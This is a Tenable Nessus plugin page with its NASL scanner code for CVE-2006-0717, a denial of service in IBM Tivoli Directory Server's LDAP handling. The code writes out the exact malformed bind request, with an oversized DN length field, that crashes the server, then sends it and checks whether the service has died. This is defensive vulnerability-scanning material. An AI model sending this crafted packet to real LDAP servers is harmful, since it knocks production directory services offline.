CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
EPSS
Percentile
95.0%
The remote host appears to be running IBM Tivoli Directory Server, an LDAP directory from IBM.
The version of IBM Tivoli Directory Server fails to handle certain malformed search requests. A user can leverage this issue to crash the LDAP server.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(20903);
script_version("1.17");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2006-0717");
script_bugtraq_id(16593);
script_name(english:"IBM Tivoli Directory Server LDAP Packet Handling DoS");
script_set_attribute(attribute:"synopsis", value:
"The remote LDAP server is prone to denial of service attacks.");
script_set_attribute(attribute:"description", value:
"The remote host appears to be running IBM Tivoli Directory Server, an
LDAP directory from IBM.
The version of IBM Tivoli Directory Server fails to handle certain
malformed search requests. A user can leverage this issue to crash
the LDAP server.");
script_set_attribute(attribute:"see_also", value:"http://web.archive.org/web/20071213090218/http://lists.immunitysec.com/pipermail/dailydave/2006-February/002921.html");
script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg24011701");
script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg24014476");
script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg24011969");
script_set_attribute(attribute:"solution", value:
"Apply the appropriate fix pack listed in the vendor support documents
referenced above.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/02/11");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/02/14");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:tivoli_directory_server");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_DENIAL);
script_family(english:"Denial of Service");
script_copyright(english:"This script is Copyright (C) 2006-2022 Tenable Network Security, Inc.");
script_dependencies("ldap_detect.nasl");
script_require_ports("Services/ldap", 389);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
port = get_service(svc: "ldap", default: 389);
# A bad request.
req = raw_string(
0x30, # universal sequence
0x16, # length of the request
0x02, 0x01, 0x01, # message id (1)
0x60, # bind request
0x12, # length
0x02, # version
0x01, # length
0x03, # 3
0x04, # DN
0x84, 0xff, 0xff, 0xff, 0xff, # length
"nessus",
0x80, 0x00 # authentication (simple)
);
# Open a socket and send the request.
soc = open_sock_tcp(port);
if (! soc) exit(1);
send(socket:soc, data:req);
res = recv(socket:soc, length:1024);
close(soc);
# If we didn't get anything back, check whether it crashed.
if (isnull(res))
{
if (service_is_dead(port: port) > 0)
security_warning(port);
exit(0);
}
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0717
web.archive.org/web/20071213090218/http://lists.immunitysec.com/pipermail/dailydave/2006-February/002921.html
www-1.ibm.com/support/docview.wss?uid=swg24011701
www-1.ibm.com/support/docview.wss?uid=swg24011969
www-1.ibm.com/support/docview.wss?uid=swg24014476